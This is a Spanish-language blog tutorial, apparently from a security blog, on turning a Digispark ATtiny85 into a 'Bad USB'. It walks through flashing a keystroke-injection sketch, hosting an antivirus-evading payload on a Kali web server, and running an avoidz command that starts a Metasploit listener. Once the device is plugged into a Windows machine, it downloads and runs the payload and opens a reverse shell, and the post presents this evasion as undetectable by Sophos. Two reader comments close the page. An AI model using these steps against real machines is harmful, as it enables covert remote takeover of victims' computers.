https://www.arduino.cc/en/Main/Donate
Abrimos el Arduino y vamos a Archivo -> Preferencias:
Colocamos en Tarjetas adicionales lo siguiente:
http://digistump.com/package_digistump_index.json y damos ok:
Clickeamos en Herramientas -> Placa: "Arduino/Genuino Uno" -> "Gestor de tarjetas ..."
Seleccionamos "Digistump AVR Boards by Digistump" -> Instalar
Esperamos que instale -> Cerrar:
Nuevamente vamos al mismo menú -> Herramientas -> Placa -> "Digispark (Default - 16.5mhz)":
Descargamos el Digistump Drivers desde: https://github.com/digistump/DigistumpArduino/releases
Descomprimimos y ejecutamos el siguiente archivo:
Abrimos el IDE de Arduino y vamos a > Archivo > Ejemplos > DigisparkKeyboard > Keyboard
Vamos luego a > Herramientas > Programador: "USBtinyISP" > USBtinyISP
Descargamos el .ino que hice para tipear automáticamente de la siguiente url: https://github.com/tirher/Arduino
Borramos lo que teníamos previamente en el IDE de Arduino y pegamos lo que descargamos del link anterior, debería quedar así:
Hacemos click en el tilde de arriba a la izquierda como indica en la imagen y luego veremos algo como muestra debajo de la flecha:
Luego seleccionamos la flecha que indica a la derecha y vemos abajo de todo en la ventana negra que nos indica cuando ingresar el USB Atiny85. Cuando aparece "Plug in device now ..." lo conectamos:
Cuando indique "100 % complete" lo desconectamos y ya tenemos el bad usb listo:
En el post previo mostré como utlizar avoid para hacer una shell reversa: http://redes-seguridad.blogspot.com.ar/2017/07/reverse-shell-indetectable-por-sophos.html ahora la voy a publicar en un webserver para poder descargarla u ejecutarla directamente del usb.
Iniciamos en el kali el apache2 y copiamos el py.exe en la ruta /var/www/html y verificamos que lo pueda acceder por una web:
Luego ejecutamos el siguiente comando, si ó si tiene que ser desde el terminal dentro del entorno gráfico, sino no funcionará:
root@kali:~/Desktop/avoidz# ./avoidz.rb -h 192.168.1.43 -f py
Cuando nos pregunte: "Whould you like to start a listener? (Y/n)" le indicamos que si y vemos como se abre solo el msfconsole y queda a la escucha esperando:
Conectamos el Bad USB en el windows y veremos que descargará el py.exe desde nuestro webserver y lo ejecutará:
Luego de unos segundos veremos la conexión reversa desde el windows al kali linux:
Vemos las sesiones abiertas y nos conectamos:
2 comentarios:
Muchas gracias!!!!!!!!! Probare!
Hola!! una pregunta, si quisieras borrar el payload para cargar otro, como se hace? tengo uno que lo conecto y tiene un payload de "hello world" pero cuando quiero meterle otro no me deja
Publicar un comentario